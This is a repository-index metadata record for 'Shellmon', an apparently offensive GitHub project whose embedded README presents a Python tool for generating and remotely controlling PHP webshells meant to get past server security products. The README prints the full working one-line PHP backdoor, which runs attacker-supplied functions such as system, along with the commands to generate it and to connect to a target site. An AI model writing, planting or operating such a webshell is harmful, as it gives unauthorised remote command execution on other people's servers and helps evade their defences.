{"id":26398276,"url":"https://github.com/22xploitercrew-team/shellmon","last_synced_at":"2025-08-05T04:23:03.649Z","repository":{"id":132511334,"uuid":"417870422","full_name":"22XploiterCrew-Team/Shellmon","owner":"22XploiterCrew-Team","description":"An Simple PHP Webshell Manager to bypassed security system","archived":false,"fork":false,"pushed_at":"2024-08-11T18:11:37.000Z","size":907,"stargazers_count":17,"open_issues_count":0,"forks_count":9,"subscribers_count":2,"default_branch":"main","last_synced_at":"2024-08-11T19:29:14.385Z","etag":null,"topics":["backdoor","bypass","bypassing","hacking-tool","imunify360","nano-shell","python3","shell","webshell"],"latest_commit_sha":null,"homepage":"https://github.com/22XploiterCrew-Team/Shellmon","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/22XploiterCrew-Team.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-10-16T15:35:04.000Z","updated_at":"2024-08-11T18:11:41.000Z","dependencies_parsed_at":"2023-06-07T22:30:53.878Z","dependency_job_id":null,"html_url":"https://github.com/22XploiterCrew-Team/Shellmon","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/22XploiterCrew-Team%2FShellmon","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/22XploiterCrew-Team%2FShellmon/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/22XploiterCrew-Team%2FShellmon/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/22XploiterCrew-Team%2FShellmon/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/22XploiterCrew-Team","download_url":"https://codeload.github.com/22XploiterCrew-Team/Shellmon/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":244033374,"owners_count":20386927,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","bypass","bypassing","hacking-tool","imunify360","nano-shell","python3","shell","webshell"],"created_at":"2025-03-17T12:29:55.470Z","updated_at":"2025-03-17T12:29:56.029Z","avatar_url":"https://github.com/22XploiterCrew-Team.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cdiv align=\"center\"\u003e\n\n![ShellMon](img/logo.png)\n![](https://img.shields.io/badge/Version-1.0.0-red)\n![](https://img.shields.io/badge/License-MIT-green)\n![](https://img.shields.io/badge/Python-3.10.0-blue)\n\n\u003e An Simple PHP Webshell Manager\n\n\u003c/div\u003e\n\n## Description\nShellmon is a tool used to create and control a webshell remotely, created using the Python3 programming language using the \"Object Oriented\" method. The resulting webshell has been coded very simply and has a size of no more than 80 bytes. \nIt provides an interactive shell in your terminal that makes it easy for you to create or control a webshell.\n\n## Instalation\nThe installation process of this tool is quite easy, it does not use an external python modules that makes your computer's storage space a bit filled.\n\nPlease download this repository or you can also clone the repository using git by typing the following command in your terminal: \n```bash\ngit clone https://github.com/22XploiterCrew-Team/Shellmon\n```\nafter that move the pre-work directory in your terminal to the ***shellmon*** directory.\n\n## Usage\nSimple interactive shell commands make it easy to run this tool.\n\ntype `python shellmon.py` in the terminal screen to display the help command.\n![help](img/help2.png)\n\nIf you want to generate a new webshell, you just need to type this command in the terminal\n```bash\npython shellmon.py -p yourpassword --generate\n```\nwebshell files will be automatically saved in your current pre-employment directory, filenames will be auto-generated with number format 0-9 and use .php extension.\n\nContent webshell:\n```php\n\u003c?=(isset($_GET[0])\u0026\u0026$_GET[0]==\"yourpassword\"?:die(\"0\"))\u0026\u0026@$_POST[0]($_POST[1]);\n```\nactually the above code can still be made simpler like this\n```php\n\u003c?=($_GET[0]==\"yourpassword\"?:die(\"0\"))\u0026\u0026@$_POST[0]($_POST[1]);\n```\nbut I'm worried that the server will send the status code ***500 Internal Server Error***, because this tool also checks the response code from the server and only receives the response code ***200 OK***.\n\n\nFurthermore, if you want to connect your uploaded webshell to the target server, you just need to type this command on the terminal screen\n```bash\npython shellmon.py -u https://target.com -p yourpassword\n```\ndisplay if successfully connected\n![result](img/res2.png)\nyou can also customize PHP shell functions by using the `--func [function]` argument, by default the function used is ***system***.\n\n#### Support\n- 22XploiterCrew\n- Banyumas Cyber Team\n- Jombang BlackHat\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F22xploitercrew-team%2Fshellmon","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F22xploitercrew-team%2Fshellmon","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F22xploitercrew-team%2Fshellmon/lists"}